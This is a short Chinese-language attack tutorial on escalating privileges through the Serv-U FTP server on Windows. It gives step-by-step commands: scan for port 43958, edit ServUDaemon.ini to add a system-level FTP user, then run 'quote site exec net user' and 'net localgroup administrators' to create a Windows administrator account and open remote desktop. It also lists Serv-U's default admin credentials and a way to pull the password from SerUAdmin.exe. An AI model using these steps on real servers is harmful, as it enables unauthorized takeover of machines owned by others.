Serv-U FTP Server,是一种被广泛运用的FTP服务器端软件,支持3x/9x/ME/NT/2K等全Windows系列。可以设定多个FTP服务器、限定登录用户的权限、登录主目录及空间大小等
Serv-U提权分两种
1.有修改权限
2.无权限修改
第一种情况时
0.判断是否安装serv-u
serv-u的默认端口是43958 可以用nmap 扫描确认
1.检查是否有可写权限
一般安装目录 c:Program FilesServ-uSerUDaemon.ini
打开配置文件
2.增加用户
在user4=添加一个系统用户
复制一个 修改名字
password 密码格式 是 gw+md5 我从https://www.cmd5.com/ 把gw123456 加密 注意gw是他的 盐 属于密码规则
把加密完的密码去替换复制的密码 password=gw+md5(gw123456)
maintenance=system 是代表系统权限 user=你命名的用户
cmd访问 ftp 连接 ip 输入你刚刚添加的用户密码
输入
quote site exec net user username password /add
quote site exec net localgroup administrators username /add
利用ftp命令quote site exec 添加用户 加入administrators 权限组
打开3389连接
第二种情况无修改权限
1.利用md5 直接去解密(ini 文件密码在ftp连)
2.默认密码,默认用户
账户:LocalAdministrator ,密码:#l@$ak#.lk;0@P
命令cmd /c net user DisKill /add & net localgroup administrators DisKill /add
3.不是默认密码时 直接把SerUAdmin.exe 下载下来 进行查看密码
直接记住这里选an字符串
. 后面就是密码 把它替换到
这也叫溢出提权
至此常用的方式都已经说了。